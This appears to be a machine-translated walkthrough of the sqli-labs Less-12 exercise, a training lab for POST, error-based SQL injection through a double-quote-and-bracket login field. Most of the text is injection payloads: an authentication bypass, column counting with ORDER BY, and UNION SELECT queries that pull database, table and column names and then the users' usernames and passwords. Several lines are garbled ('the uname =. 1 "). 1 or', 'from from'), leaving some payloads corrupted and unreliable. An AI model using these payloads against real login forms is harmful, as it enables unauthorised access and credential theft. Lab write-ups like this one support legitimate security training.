Less-12 POST -Error Based - Double quotes - String - with twist
Less-11 with the difference that a Less-12 is a single quote bracketed double quotes, for Less-12 on directly to the exercises burp suite, step consistent with Less-11.
0x01. Original page
User names and passwords two parameters were uname and passwd. Burp submitted parameters uname = xxx & passwd = xxx
0x02. Analyzing injection type
uname=1&passwd=1&submit=Submit
uname=1’&passwd=1&submit=Submit
uname=1"&passwd=1&submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1
The statement is given can be seen that the double-quote character in parentheses injection
. Analyzing the injection point 0x03
universal password attempts:
the uname =. 1 "). 1 or the passwd = =. 1. 1 & # = & Submit the Submit
0x04 determines the number of fields.
uname=admin") order by 3#&passwd=1&submit=Submit
uname=admin") order by 2#&passwd=1&submit=Submit
Query returns the number of fields is 2, but not the number of fields in the table 2.
. 0x05 Get user and database name
the uname =. 1 ") Union SELECT User (), Database () - + & the passwd =. 1 & Submit = the Submit
. 0x06 Get all the table names security database
uname = 1") union select 1 , group_concat (table_name ) from information_schema.tables where table_schema = 'security ' # & passwd = 1 & submit = Submit
0x07. Get all the field names users table
the uname =. 1 ") Union SELECT. 1, GROUP_CONCAT (column_name) from from information_schema.columns WHERE TABLE_SCHEMA = 'Security' and table_name = 'users' # & the passwd =. 1 & Submit = the Submit
0x08. Gets all field values
uname = 1 ") union select 1 , group_concat (username, 0x3a, password) from users # & passwd = 1 & submit = Submit